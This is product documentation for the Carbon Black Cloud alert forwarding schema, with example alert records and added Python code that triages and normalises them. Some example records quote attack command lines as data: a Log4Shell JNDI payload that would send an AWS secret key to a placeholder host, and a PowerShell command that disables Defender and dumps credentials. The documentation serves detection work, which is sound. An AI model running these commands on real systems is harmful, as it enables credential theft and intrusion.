Alert Schema 2.1.0
Introduction
The following tables list the fields that can be included in an alert record for each alert type generated by the Carbon Black Cloud.
This Data Forwarder Schema (v2.1.0) is aligned with the Alerts v7 API schema.
Fields in the Schema section are included with most alert types; the exceptions are annotated in the Alert Types Supported column.
Alert types that are emitted from the Data Forwarder are dependent on the features you have enabled in Carbon Black Cloud. Possible Alert types are:
- CB_ANALYTICS - created from the Endpoint Standard NGAV offering.
- CONTAINER_RUNTIME - created from the Container Security offering. Deprecated as of May 2025; see the linked deprecation notice for more information.
- DEVICE_CONTROL - created when an endpoint attempts to access a blocked USB device.
- HOST_BASED_FIREWALL - created from network detections in the Endpoint Standard Host-Based Firewall add-on.
- INTRUSION_DETECTION_SYSTEM - created by the XDR extension to Enterprise EDR.
- WATCHLIST - created from alert enabled watchlists in Enterprise EDR.
Alert Type Examples
{
"org_key":"ABCD1234",
"alert_url":"defense.conferdeploy.net/alerts?s[c][query_string]=id:ca316d99-a808-3779-8aab-62b2b6d9541c&orgKey=ABCD1234",
"id":"ca316d99-a808-3779-8aab-62b2b6d9541c",
"type":"INTRUSION_DETECTION_SYSTEM",
"backend_timestamp":"2023-02-03T17:27:33.007Z",
"backend_update_timestamp":"2023-02-03T17:27:33.007Z",
"detection_timestamp":"2023-02-03T17:22:03.945Z",
"first_event_timestamp":"2023-02-03T17:22:03.945Z",
"last_event_timestamp":"2023-02-03T17:22:03.945Z",
"severity":1,
"reason":"HTTP traffic from asset DEV01-39X-1 matched IDS signature for threat CVE-2021-44228 Exploit",
"reason_code":"DC68DDD6-4B82-4AAF-9321-B4EBB32F5C2D:B5974D4D-265E-4FAF-8F71-2F76AAD67857",
"threat_id":"bbe232a02b6c5583786503c25fe9a1d29d6ed39d3a295a6ff5c07f81629d0017",
"primary_event_id":"21AB6B27-9F72-11ED-A79A-005056A53F17",
"policy_applied":"NOT_APPLIED",
"run_state":"RAN",
"sensor_action":"ALLOW",
"workflow": {
"change_timestamp":"2023-02-03T17:27:33.007Z",
"changed_by_type":"SYSTEM",
"changed_by":"ALERT_CREATION",
"closure_reason":"NO_REASON",
"status":"OPEN"
},
"determination":{
"change_timestamp":"2023-02-03T17:27:33.007Z",
"value":"NONE",
"changed_by_type":"SYSTEM",
"changed_by":"ALERT_CREATION"
},
"alert_notes_present":false,
"is_updated":false,
"rule_category_id":"DC68DDD6-4B82-4AAF-9321-B4EBB32F5C2D",
"rule_id":"B5974D4D-265E-4FAF-8F71-2F76AAD67857",
"device_id":17482451,
"device_name":"DEV01-39X-1",
"device_uem_id":"",
"device_target_value":"MEDIUM",
"device_policy":"Standard",
"device_policy_id":165700,
"device_os":"WINDOWS",
"device_os_version":"Windows 10 x64",
"device_username":"DemoMachine",
"device_location":"UNKNOWN",
"device_external_ip":"66.170.99.2",
"device_internal_ip":"10.203.105.21",
"mdr_alert":false,
"mdr_alert_notes_present":false,
"ttps":[],
"attack_tactic":"TA0001",
"attack_technique":"T1190",
"process_guid":"ABCD1234-010ac2d3-00001694-00000000-1d937f40884b9e0",
"process_pid":5780,
"process_name":"c:\\windows\\system32\\curl.exe",
"process_sha256":"d76d08c04dfa434de033ca220456b5b87e6b3f0108667bd61304142c54addbe4",
"process_md5":"eac53ddafb5cc9e780a7cc086ce7b2b1",
"process_effective_reputation":"TRUSTED_WHITE_LIST",
"process_reputation":"TRUSTED_WHITE_LIST",
"process_cmdline":"curl -H \"Host: \\${jndi:ldap://\\{env:AWS_SECRET_ACCESS_KEY}.badserver.io}\" http://google.com/testingids",
"process_username":"DEV01-39X-1\\bit9qa",
"process_issuer":["Microsoft Windows Production PCA 2011"],
"process_publisher":["Microsoft Windows"],
"parent_guid":"ABCD1234-010ac2d3-0000225c-00000000-1d9300e2bb5211a",
"parent_pid":8796,
"parent_name":"c:\\windows\\system32\\cmd.exe",
"parent_sha256":"b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450",
"parent_md5":"8a2122e8162dbef04694b9c3e0b6cdee",
"parent_effective_reputation":"TRUSTED_WHITE_LIST",
"parent_reputation":"TRUSTED_WHITE_LIST",
"parent_cmdline":"\"C:\\WINDOWS\\system32\\cmd.exe\" ",
"parent_username":"DEV01-39X-1\\bit9qa",
"childproc_guid":"",
"childproc_username":"",
"childproc_cmdline":"",
"netconn_remote_port":80,
"netconn_local_port":49233,
"netconn_protocol":"",
"netconn_remote_domain":"google.com",
"netconn_remote_ip":"142.250.189.174",
"netconn_local_ip":"10.203.105.21",
"netconn_remote_ipv4":"142.250.189.174",
"netconn_local_ipv4":"10.203.105.21",
"tms_rule_id":"4b98443a-ba0d-4ff5-b99e-e5e70432a214",
"threat_name":"CVE-2021-44228 Exploit",
"version":"2.1.0"
}
{
"org_key":"ABCD1234",
"alert_url":"https://defense.conferdeploy.net/alerts?orgKey=ABCD1234&s%5Bc%5D%5Bquery_string%5D=id%3Af0c7970b-f23c-919e-0cd8-7a38bd373a6f",
"id":"f0c7970b-f23c-919e-0cd8-7a38bd373a6f",
"type":"CONTAINER_RUNTIME",
"is_updated":false,
"detection_timestamp":"2023-02-06T00:10:51.176Z",
"first_event_timestamp":"2023-02-06T00:09:19.320Z",
"last_event_timestamp":"2023-02-06T00:09:19.320Z",
"severity":5,
"reason":"Detected a connection to a public destination that isn't allowed for this scope",
"threat_id":"0811c72d38d40951b4b90dba05638a20669c9f001ea2e65eeb4768f813d6ed0c",
"primary_event_id":"X0z55sxeTGWPfKuzPkFlCg-61",
"workflow":{
"status":"OPEN",
"change_timestamp":"2023-02-06T00:13:37.663Z",
"changed_by_type":"SYSTEM",
"changed_by":"ALERT_CREATION",
"closure_reason":"NO_REASON"
},
"alert_notes_present":false,
"policy_applied":"NOT_APPLIED",
"run_state":"RAN",
"reason_code":"2e5170e7-2665-49d2-829e-f5bdeefe6b06:f8b1637a-dc0c-49bb-bc28-5b48f97e6d58",
"sensor_action":"ALLOW",
"device_target_value":"MEDIUM",
"device_os":"WINDOWS",
"device_location":"UNKNOWN",
"k8s_policy_id":"ef4ccd0b-df14-4f5d-8454-480c5193a0b7",
"k8s_policy":"Big runtime policy",
"k8s_rule_id":"11111111-1111-1111-1111-111111111111",
"k8s_rule":"Allowed public destinations",
"k8s_cluster":"tomer:sensor-aks",
"k8s_namespace":"kube-system",
"k8s_kind":"DaemonSet",
"k8s_workload_name":"ama-logs",
"k8s_pod_name":"ama-logs-gm5tt",
"connection_type":"EGRESS",
"ip_reputation":96,
"netconn_remote_port":443,
"netconn_local_port":56618,
"netconn_protocol":"TCP",
"netconn_remote_domain":"westeurope.monitoring.azure.com",
"netconn_remote_ip":"20.50.65.82",
"netconn_local_ip":"10.244.2.22",
"netconn_remote_ipv4":"20.50.65.82",
"netconn_local_ipv4":"10.244.2.22",
"remote_is_private":false,
"process_guid":"ABCD1234-00000000-00200e62-00000000-1d92c1262642b33",
"process_pid":2100834,
"process_name":"KUBERNETES_RUNTIME_NODE_AGENT",
"process_sha256":"506ffc437f5d3c4803a45b895b02557e7280eb3c6eb7d8ff8bd9073990e989d5",
"process_md5":"4cbdc5f51d0397b26886191b799131d5",
"process_reputation":"NOT_LISTED",
"process_effective_reputation":"RESOLVING",
"mdr_alert_notes_present":false,
"mdr_alert":false,
"version":"2.1.0"
}
{
"org_key":"ABCD1234",
"alert_url":"https://defense.conferdeploy.net/alerts?orgKey=ABCD1234&s%5Bc%5D%5Bquery_string%5D=id%3A3d80bd8b-7770-40a7-8d6b-8268fb15c59f",
"id":"3d80bd8b-7770-40a7-8d6b-8268fb15c59f",
"type":"WATCHLIST",
"is_updated":false,
"detection_timestamp":"2023-07-17T17:21:13.483Z",
"backend_timestamp":"2023-07-17T17:21:34.063Z",
"backend_update_timestamp":"2023-07-17T17:21:34.063Z",
"first_event_timestamp":"2023-07-17T17:19:00.412Z",
"last_event_timestamp":"2023-07-17T17:19:00.412Z",
"severity":10,
"reason":"Process powershell.exe was detected by the report \"Credential Access - AMSI - Suspect Kerberos Ticket Request Behavior\" in watchlist \"AMSI Threat Intelligence\"",
"threat_id":"CF4E6DE74AA8B188C0346A54FDEA940C",
"primary_event_id":"VUX7Bu7vTrWwnU8-uSVh1A-0",
"workflow":{
"status":"OPEN",
"change_timestamp":"2023-07-17T17:21:34.063Z",
"changed_by_type":"SYSTEM",
"changed_by":"ALERT_CREATION",
"closure_reason":"NO_REASON"
},
"determination":{
"value":"NONE",
"change_timestamp":"2023-07-17T17:21:34.063Z"
},
"alert_notes_present":false,
"policy_applied":"NOT_APPLIED",
"run_state":"RAN",
"reason_code":"cf4e6de7-4aa8-3188-8034-6a54fdea940c:e17d957d-b504-3462-816c-f182fe1d80ab",
"sensor_action":"ALLOW",
"device_target_value":"MEDIUM",
"device_policy_id":6525,
"device_policy":"default",
"device_id":5890528,
"device_name":"ABT102675",
"device_uem_id":"596B6C4DD49AEF4AB3713363DDBB1F11",
"device_os":"WINDOWS",
"device_os_version":"Windows 11 x64",
"device_username":"DemoMachine",
"device_location":"UNKNOWN",
"device_external_ip":"49.206.61.4",
"device_internal_ip":"192.168.0.104",
"report_id":"LrKOC7DtQbm4g8w0UFruQg-b1c1ae83-f66b-4aa3-a496-363e296f4018",
"report_name":"Credential Access - AMSI - Suspect Kerberos Ticket Request Behavior",
"report_description":"Service accounts in Windows Active Directory environments have the ability to register under an AD security principle (user or computer) as a (SPN) Service Principal Name. The SPN registration allows for kerberos clients to request a kerberos service ticket associated with the service account SPN. This kerberos TGS is encrypted using the service accounts password. If a weak password is assigned to this service account an attacker can make an out of band request for one of these kerberos service tickets and crack it offline with tools like Jack the Ripper. This detection looks for fileless behaviors related to the out of band kerberos ticket request. If you are responding to this alert you should take immediate action and look at the process that alerted on this behavior as well as the other fileless script loads events.",
"report_tags":[
"credentialaccess",
"t1558",
"windows",
"amsi",
"attack",
"attackframework"
],
"report_link":"https://attack.mitre.org/techniques/T1558/003/",
"ioc_id":"b1c1ae83-f66b-4aa3-a496-363e296f4018",
"ioc_hit":"fileless_scriptload_cmdline:\"System.IdentityModel.Tokens.KerberosRequestorSecurityToken\" OR scriptload_content:\"System.IdentityModel.Tokens.KerberosRequestorSecurityToken\"",
"watchlists":[{
"id":"Ci7w5B4URg6HN60hatQMQ",
"name":"AMSI Threat Intelligence"
}],
"process_guid":"ABCD1234-0059e1e0-00003544-00000000-1d9b8db27a4d423",
"process_pid":13636,
"process_name":"c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe",
"process_sha256":"d436e66c0d092508e4b85290815ab375695fa9013c7423a3a27fed4f1acf90bd",
"process_md5":"0499440c4b0783266183246e384c6657",
"process_reputation":"TRUSTED_WHITE_LIST",
"process_effective_reputation":"TRUSTED_WHITE_LIST",
"process_cmdline":"powershell.exe -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -",
"process_username":"NT AUTHORITY\\SYSTEM",
"process_issuer":["Microsoft Windows Production PCA 2011"],
"process_publisher":["Microsoft Windows"],
"parent_guid":"ABCD1234-0059e1e0-00002890-00000000-1d9a898aa24acc9",
"parent_pid":10384,
"parent_name":"c:\\program files\\unowhy\\hisqool manager\\hisqoolmanager.exe",
"parent_sha256":"4ab2c4932e01ab8460bd8bff5afb0c76e9e238c10ce47515be40c49f652d0282",
"parent_md5":"c7e583681f0958d4f5d32afd09d8084b",
"parent_reputation":"NOT_LISTED",
"parent_effective_reputation":"NOT_LISTED",
"parent_cmdline":"\"C:\\Program Files\\Unowhy\\HiSqool Manager\\HiSqoolManager.exe\" ",
"parent_username":"NT AUTHORITY\\SYSTEM",
"mdr_alert_notes_present":false,
"mdr_alert":false,
"ml_classification_final_verdict":"ANOMALOUS",
"ml_classification_global_prevalence":"MEDIUM",
"ml_classification_org_prevalence":"LOW",
"version":"2.1.0"
}
{
"org_key":"ABCD1234",
"alert_url":"https://defense.conferdeploy.net/alerts?orgKey=ABCD1234&s%5Bc%5D%5Bquery_string%5D=id%3A411eedfc-8408-2f9e-59f2-a83dfaae0ec1",
"id":"411eedfc-8408-2f9e-59f2-a83dfaae0ec1",
"type":"CB_ANALYTICS",
"is_updated":true,
"detection_timestamp":"2023-07-17T17:15:51.708Z",
"backend_timestamp":"2023-07-17T17:16:50.960Z",
"backend_update_timestamp":"2023-07-17T17:18:03.397Z",
"first_event_timestamp":"2023-07-17T17:15:33.396Z",
"last_event_timestamp":"2023-07-17T17:15:33.396Z",
"severity":5,
"reason":"A known virus (HackTool: Powerpuff) was detected running.",
"threat_id":"9e0afc389c1acc43b382b1ba590498d2",
"primary_event_id":"94953e4524c511ee86284f0541a5184d",
"workflow":{
"status":"OPEN",
"change_timestamp":"2023-07-17T17:16:50.960Z",
"changed_by_type":"SYSTEM",
"changed_by":"ALERT_CREATION",
"closure_reason":"NO_REASON"
},
"determination":{
"value":"NONE",
"change_timestamp":"2023-07-17T17:16:50.960Z"
},
"alert_notes_present":false,
"policy_applied":"NOT_APPLIED",
"run_state":"RAN",
"reason_code":"T_REP_VIRUS",
"sensor_action":"ALLOW",
"device_target_value":"MISSION_CRITICAL",
"device_policy_id":112221,
"device_policy":"SSQ_Policy",
"device_id":6948863,
"device_name":"Kognos-W19-CB-3",
"device_os":"WINDOWS",
"device_os_version":"Windows Server 2019 x64",
"device_username":"demouser@demo.org",
"device_location":"OFFSITE",
"device_external_ip":"34.234.170.45",
"device_internal_ip":"10.0.14.120",
"ttps":[
"FILELESS",
"MALWARE_APP",
"MITRE_T1059_CMD_LINE_OR_SCRIPT_INTER",
"MITRE_T1059_001_POWERSHELL",
"RUN_MALWARE_APP"
],
"attack_tactic":"TA0002",
"process_guid":"ABCD1234-006a07ff-00000e10-00000000-1d9b8d24ab16c73",
"process_pid":3600,
"process_name":"c:\\users\\administrator\\appdata\\local\\temp\\powerdump.ps1",
"process_sha256":"3b463c94b52414cfaad61ecdac64ca84eaea1ab4be69f75834aaa7701ab5e7d0",
"process_md5":"42a80cc2333b612b63a859f17474c9af",
"process_reputation":"KNOWN_MALWARE",
"process_effective_reputation":"KNOWN_MALWARE",
"process_cmdline":"\"powershell.exe\" & {Write-Host \\\"\"STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON\\\"\" -fore green\nImport-Module \\\"\"$Env:Temp\\PowerDump.ps1\\\"\"\nInvoke-PowerDump}",
"process_username":"KOGNOS-W19-CB-3\\Administrator",
"parent_guid":"ABCD1234-006a07ff-00000fb8-00000000-1d9b8d2494e29ed",
"parent_pid":4024,
"parent_name":"c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe",
"parent_sha256":"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"parent_reputation":"TRUSTED_WHITE_LIST",
"parent_effective_reputation":"TRUSTED_WHITE_LIST",
"parent_username":"KOGNOS-W19-CB-3\\Administrator",
"childproc_guid":"ABCD1234-006a07ff-00000000-00000000-19db1ded53e8000",
"childproc_effective_reputation":"RESOLVING",
"childproc_username":"KOGNOS-W19-CB-3\\Administrator",
"blocked_effective_reputation":"RESOLVING",
"mdr_alert_notes_present":false,
"mdr_alert":false,
"version":"2.1.0"
}
{
"org_key": "ABCD1234",
"alert_url": "defense.conferdeploy.net/alerts?s[c][query_string]=id:94992bd4-b072-3158-aa7b-36bea9f54e15&orgKey=ABCD1234",
"id": "94992bd4-b072-3158-aa7b-36bea9f54e15",
"type": "HOST_BASED_FIREWALL",
"backend_timestamp": "2025-04-02T08:08:43.716Z",
"backend_update_timestamp": "2025-04-02T08:08:43.716Z",
"detection_timestamp": "2025-04-02T08:07:18.070Z",
"first_event_timestamp": "2025-04-02T08:07:18.070Z",
"last_event_timestamp": "2025-04-02T08:07:18.070Z",
"severity": 4,
"reason": "Inbound UDP connection blocked by firewall rule group block ftp",
"reason_code": "DD71F364-4A8C-4B14-89F6-7041CC6BEDEA:CE7A4C0E-0F7D-449B-B816-615C66AEB91D",
"threat_id": "353f695cedb2ce00703618f9af2454412f09ed88163fd645a72bcf4f0d1eac05",
"primary_event_id": "9aN-VbSURHe63RCttnuTYw-0",
"policy_applied": "APPLIED",
"run_state": "DID_NOT_RUN",
"sensor_action": "DENY",
"workflow": {
"change_timestamp": "2025-04-02T08:08:43.716Z",
"changed_by_type": "SYSTEM",
"changed_by": "ALERT_CREATION",
"closure_reason": "NO_REASON",
"status": "OPEN"
},
"determination": {
"change_timestamp": "2025-04-02T08:08:43.716Z",
"value": "NONE",
"changed_by_type": "SYSTEM",
"changed_by": "ALERT_CREATION"
},
"alert_notes_present": false,
"alert_origin": "ALERT_ORIGIN_UNKNOWN",
"is_updated": false,
"rule_category_id": "DD71F364-4A8C-4B14-89F6-7041CC6BEDEA",
"rule_id": "CE7A4C0E-0F7D-449B-B816-615C66AEB91D",
"device_id": 18118170,
"device_name": "device-name.3663511-23",
"device_target_value": "MEDIUM",
"device_policy": "Raz-test",
"device_policy_id": 20314731,
"device_os": "WINDOWS",
"device_os_version": "Windows 10 x64 SP: 1",
"device_username": "device-name.3663511-23@carbonblack.com",
"device_location": "UNKNOWN",
"device_external_ip": "34.145.18.128",
"mdr_alert": false,
"mdr_alert_notes_present": false,
"process_guid": "ABCD1234-0114761a-001a8553-00000000-1dba3a640911966",
"process_pid": 1738067,
"process_name": "SYSTEM",
"process_sha256": "644d15ea6a0cb7ac2014c15187306ebf790e936c86a94dd87754e2a9622c64a7",
"process_md5": "3dcc07415880c8378edcc9c799df99da",
"process_effective_reputation": "LOCAL_WHITE",
"process_reputation": "NOT_LISTED",
"process_username": "NT AUTHORITY\\SYSTEM",
"netconn_remote_port": 138,
"netconn_local_port": 138,
"netconn_remote_ip": "10.203.109.77",
"netconn_local_ip": "10.203.111.255",
"netconn_remote_ipv4": "10.203.109.77",
"netconn_local_ipv4": "10.203.111.255",
"version": "2.1.0"
}
{
"org_key": "ABCD1234",
"alert_url": "defense.conferdeploy.net/alerts?s[c][query_string]=id:a90debb9-788b-4268-8926-1412c45bae19&orgKey=ABCD1234",
"id": "a90debb9-788b-4268-8926-1412c45bae19",
"type": "DEVICE_CONTROL",
"backend_timestamp": "2025-04-02T08:08:24.157Z",
"backend_update_timestamp": "2025-04-02T08:08:24.157Z",
"detection_timestamp": "2025-04-02T08:07:18.188Z",
"first_event_timestamp": "2025-04-02T08:07:18.188Z",
"last_event_timestamp": "2025-04-02T08:07:18.188Z",
"severity": 3,
"reason": "Access attempted on unapproved USB device Lexar USB Flash Drive USB Device (SN: I891EGANR1ZYKDID). A Deny Policy Action was applied.",
"reason_code": "6D578342-9DE5-4353-9C25-1D3D857BFC5B:DCAEB1FA-513C-4026-9AB6-37A935873FBC",
"threat_id": "111546d4945db64c849f3aac5b4b62740f7c4d8f537fcd85cafd3b53c8e4d3ea",
"primary_event_id": "5b9dkxhuQ0anNHtDea77Sg-0",
"policy_applied": "APPLIED",
"run_state": "DID_NOT_RUN",
"sensor_action": "DENY",
"workflow": {
"change_timestamp": "2025-04-02T08:08:24.157Z",
"changed_by_type": "SYSTEM",
"changed_by": "ALERT_CREATION",
"closure_reason": "NO_REASON",
"status": "OPEN"
},
"determination": {
"change_timestamp": "2025-04-02T08:08:24.157Z",
"value": "NONE",
"changed_by_type": "SYSTEM",
"changed_by": "ALERT_CREATION"
},
"alert_notes_present": false,
"alert_origin": "ALERT_ORIGIN_UNKNOWN",
"is_updated": false,
"device_id": 18118172,
"device_name": "device-name-1677785023.154724-39",
"device_target_value": "MEDIUM",
"device_policy": "Raz-test",
"device_policy_id": 20314731,
"device_os": "WINDOWS",
"device_os_version": "Windows 10 x64 SP: 1",
"device_username": "device-name-1677785023.154724-39@carbonblack.com",
"device_location": "UNKNOWN",
"device_external_ip": "34.145.18.128",
"mdr_alert": false,
"mdr_alert_notes_present": false,
"vendor_name": "Lexar",
"vendor_id": "0x05DC",
"product_name": "USB Flash Drive",
"product_id": "0x56A2D",
"external_device_friendly_name": "Lexar USB Flash Drive USB Device",
"serial_number": "I891EGANR1ZYKDID",
"version": "2.1.0"
}
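The six records above are what a consumer of the Data Forwarder actually receives, so the first thing most teams write is a small triage layer that validates each record, branches on `type`, and pulls out the context a responder needs for that type. The following is an added example, not Carbon Black code; it assumes the forwarder delivers newline-delimited JSON (one alert object per line) and that records carry the v2.1.0 fields shown above. The embedded feed is constructed from shortened copies of this page's example records plus one deliberately truncated line, and the severity threshold is a constructed choice.

```python
"""Triage Carbon Black Cloud Data Forwarder alert records by type.

Added example; this is not Carbon Black code. It assumes the forwarder
delivers newline-delimited JSON (one alert object per line) carrying the
v2.1.0 fields shown on this page. SAMPLE_FEED is constructed from
shortened versions of the page's example records plus one truncated line.
"""
import json

SCHEMA_VERSION = "2.1.0"

SAMPLE_FEED = "\n".join([
    json.dumps({"id": "ca316d99-a808-3779-8aab-62b2b6d9541c", "version": SCHEMA_VERSION,
                "type": "INTRUSION_DETECTION_SYSTEM", "severity": 1, "run_state": "RAN",
                "sensor_action": "ALLOW", "device_name": "DEV01-39X-1",
                "attack_technique": "T1190", "threat_name": "CVE-2021-44228 Exploit",
                "netconn_remote_ip": "142.250.189.174",
                "process_name": "c:\\windows\\system32\\curl.exe"}),
    json.dumps({"id": "a90debb9-788b-4268-8926-1412c45bae19", "version": SCHEMA_VERSION,
                "type": "DEVICE_CONTROL", "severity": 3, "run_state": "DID_NOT_RUN",
                "sensor_action": "DENY", "device_name": "device-name-1677785023.154724-39",
                "vendor_id": "0x05DC", "product_id": "0x56A2D",
                "serial_number": "I891EGANR1ZYKDID"}),
    json.dumps({"id": "3d80bd8b-7770-40a7-8d6b-8268fb15c59f", "version": SCHEMA_VERSION,
                "type": "WATCHLIST", "severity": 10, "run_state": "RAN",
                "sensor_action": "ALLOW", "device_name": "ABT102675",
                "report_name": "Credential Access - AMSI - Suspect Kerberos Ticket Request Behavior",
                "watchlists": [{"id": "Ci7w5B4URg6HN60hatQMQ", "name": "AMSI Threat Intelligence"}],
                "ioc_id": "b1c1ae83-f66b-4aa3-a496-363e296f4018",
                "process_name": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"}),
    '{"id": "broken", "type": "CB_ANALYTICS",',   # truncated record; must not stop the batch
])


def parse_feed(text):
    """Split NDJSON into records; return (records, rejected line numbers).

    A line is rejected when it is not valid JSON or when its `version`
    is not the schema version this code was written against, so an
    unexpected schema change is surfaced instead of silently mis-parsed.
    """
    records, rejected = [], []
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            rejected.append(n)
            continue
        if rec.get("version") != SCHEMA_VERSION:
            rejected.append(n)
            continue
        records.append(rec)
    return records, rejected


def prevented(alert):
    """True when the sensor blocked the activity (sensor_action DENY or TERMINATE)."""
    return alert.get("sensor_action") in ("DENY", "TERMINATE")


# Type-specific context extractors, keyed by the `type` values in the Introduction.
EXTRACTORS = {
    "INTRUSION_DETECTION_SYSTEM": lambda a: {
        "technique": a.get("attack_technique"), "threat": a.get("threat_name"),
        "remote": a.get("netconn_remote_ip"), "process": a.get("process_name")},
    "DEVICE_CONTROL": lambda a: {
        "vendor_id": a.get("vendor_id"), "product_id": a.get("product_id"),
        "serial": a.get("serial_number")},
    "WATCHLIST": lambda a: {
        "report": a.get("report_name"), "ioc_id": a.get("ioc_id"),
        "watchlists": [w.get("name") for w in a.get("watchlists", [])],
        "process": a.get("process_name")},
    "HOST_BASED_FIREWALL": lambda a: {
        "rule_id": a.get("rule_id"), "remote": a.get("netconn_remote_ip"),
        "port": a.get("netconn_remote_port")},
    "CB_ANALYTICS": lambda a: {
        "ttps": a.get("ttps", []), "reputation": a.get("process_effective_reputation"),
        "process": a.get("process_name")},
    "CONTAINER_RUNTIME": lambda a: {
        "cluster": a.get("k8s_cluster"), "namespace": a.get("k8s_namespace"),
        "workload": a.get("k8s_workload_name"), "remote": a.get("netconn_remote_domain")},
}


def triage(alert, min_severity=5):
    """Summarise one alert and decide whether a human needs to look at it.

    An alert needs attention when it is at or above min_severity (a
    constructed threshold) and the sensor did not prevent it: run_state
    RAN together with sensor_action ALLOW means the activity really
    happened on the endpoint.
    """
    atype = alert.get("type", "UNKNOWN")
    severity = alert.get("severity", 0)
    blocked = prevented(alert)
    ran = alert.get("run_state") == "RAN"
    return {
        "id": alert.get("id"), "type": atype, "severity": severity,
        "device": alert.get("device_name"), "blocked": blocked,
        "needs_attention": severity >= min_severity and ran and not blocked,
        "context": EXTRACTORS.get(atype, lambda a: {})(alert),
    }


def triage_feed(text, min_severity=5):
    """Parse a feed and triage every valid record; returns (summaries, rejected)."""
    records, rejected = parse_feed(text)
    return [triage(r, min_severity) for r in records], rejected
```

Run on the embedded feed, `triage_feed(SAMPLE_FEED)` rejects the truncated fourth line, marks the DEVICE_CONTROL alert as blocked, and flags only the severity-10 WATCHLIST alert (which ran and was allowed) as needing attention.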
New fields
New fields introduced since the previous schema version are marked v2.1.0 in the table. You can isolate them by typing 2.1.0 in the Field Name filter box.
Data Types
Find more detail on the data types here.
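Three definitions in the Schema table below trip up new consumers: the ISO 8601 UTC timestamps end in `Z`, only one of each `netconn_*_ipv4` / `netconn_*_ipv6` pair is populated and the IPv6 value is a hex string without colon separators, and an alert can be forwarded several times (a backend update sets `is_updated` to true, while a user workflow change such as adding a note produces a fresh copy with `is_updated` false). The following added example, not Carbon Black code, normalises those three things. The ordering rule for duplicate copies (latest `backend_update_timestamp`, then latest `workflow.change_timestamp`) is an assumption built on those definitions, and the sample records are constructed.

```python
"""Normalise Carbon Black Cloud Data Forwarder alert copies.

Added example, not Carbon Black code. It relies on three definitions
from the v2.1.0 schema table: timestamps are ISO 8601 UTC ('...Z'); only
one of the netconn_*_ipv4 / netconn_*_ipv6 pairs is populated, the IPv6
value being a bare hex string with no colons; and a backend-initiated
update sets is_updated=true while a user workflow change produces a new
copy with is_updated=false. The copy-ordering rule and SAMPLE records
are constructed assumptions for the example.
"""
import ipaddress
from datetime import datetime, timezone


def parse_ts(value):
    """Parse the schema's ISO 8601 UTC timestamps; missing values sort first."""
    if not value:
        return datetime.min.replace(tzinfo=timezone.utc)
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def expand_ipv6(raw):
    """Turn the forwarder's colon-less hex IPv6 form into standard notation.

    '20010db8000000000000000000000001' -> '2001:db8::1'. Returns None for
    empty or malformed input instead of raising, so one bad record cannot
    stall a pipeline.
    """
    if not raw:
        return None
    try:
        if ":" in raw:                       # already in standard notation
            return str(ipaddress.IPv6Address(raw))
        if len(raw) != 32:
            return None
        return str(ipaddress.IPv6Address(int(raw, 16)))
    except ValueError:
        return None


def netconn_endpoints(alert):
    """Return (local, remote) as strings, from whichever address family is populated."""
    out = []
    for side in ("local", "remote"):
        v4 = alert.get(f"netconn_{side}_ipv4")
        v6 = expand_ipv6(alert.get(f"netconn_{side}_ipv6"))
        out.append(v4 or v6 or alert.get(f"netconn_{side}_ip") or None)
    return tuple(out)


def copy_rank(alert):
    """Ordering key for copies of one alert: later backend update wins,
    then a later workflow change (the copy a user action produced)."""
    workflow = alert.get("workflow") or {}
    return (parse_ts(alert.get("backend_update_timestamp")),
            parse_ts(workflow.get("change_timestamp")))


def latest_copies(records):
    """Collapse multiple forwarded copies of the same alert id to the newest one."""
    best = {}
    for rec in records:
        aid = rec.get("id")
        if not aid:
            continue
        if aid not in best or copy_rank(rec) > copy_rank(best[aid]):
            best[aid] = rec
    return best


# Constructed sample: creation, a backend enrichment, then an analyst note.
SAMPLE = [
    {"id": "A-1", "type": "WATCHLIST", "is_updated": False,
     "backend_update_timestamp": "2023-07-17T17:21:34.063Z",
     "workflow": {"status": "OPEN", "change_timestamp": "2023-07-17T17:21:34.063Z"},
     "netconn_local_ipv6": "fd000000000000000000000000000010",
     "netconn_remote_ipv6": "20010db8000000000000000000000001"},
    {"id": "A-1", "type": "WATCHLIST", "is_updated": True,          # backend update
     "backend_update_timestamp": "2023-07-17T17:30:00.000Z",
     "workflow": {"status": "OPEN", "change_timestamp": "2023-07-17T17:21:34.063Z"}},
    {"id": "A-1", "type": "WATCHLIST", "is_updated": False,         # note added by a user
     "backend_update_timestamp": "2023-07-17T17:30:00.000Z",
     "workflow": {"status": "IN_PROGRESS", "change_timestamp": "2023-07-17T18:00:00.000Z"}},
]
```

Keying on `is_updated` alone would keep the second copy and lose the analyst's status change; ranking on both timestamps keeps the third, which carries the newest backend state and the newest workflow state.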
Schema
Note: Certain fields that were previously included in this listing, but which never have and never will appear in Data Forwarder output, have been removed.

Field Name | Definition | Datatype | Alert Types Supported |
---|---|---|---|
alert_notes_present | True if notes are present on the alert ID; false if notes are not present. | Boolean | CB_ANALYTICS, HOST_BASED_FIREWALL, CONTAINER_RUNTIME, DEVICE_CONTROL, WATCHLIST, INTRUSION_DETECTION_SYSTEM |
alert_origin (v2.1.0) | How the alert was created. Possible values: MDR, MDR_THREAT_HUNT | String | CB_ANALYTICS, HOST_BASED_FIREWALL, CONTAINER_RUNTIME, DEVICE_CONTROL, WATCHLIST, INTRUSION_DETECTION_SYSTEM |
alert_url | Link to the Alerts page for this alert; does not vary by alert type | String | CB_ANALYTICS, HOST_BASED_FIREWALL, CONTAINER_RUNTIME, DEVICE_CONTROL, WATCHLIST, INTRUSION_DETECTION_SYSTEM |
attack_tactic | A tactic from the MITRE ATT&CK framework; defines a reason for an adversary's action, such as achieving credential access | String | CB_ANALYTICS, WATCHLIST, INTRUSION_DETECTION_SYSTEM |
attack_technique | A technique from the MITRE ATT&CK framework; defines an action an adversary takes to accomplish a goal, such as dumping credentials to achieve credential access | String | CB_ANALYTICS, WATCHLIST, INTRUSION_DETECTION_SYSTEM |
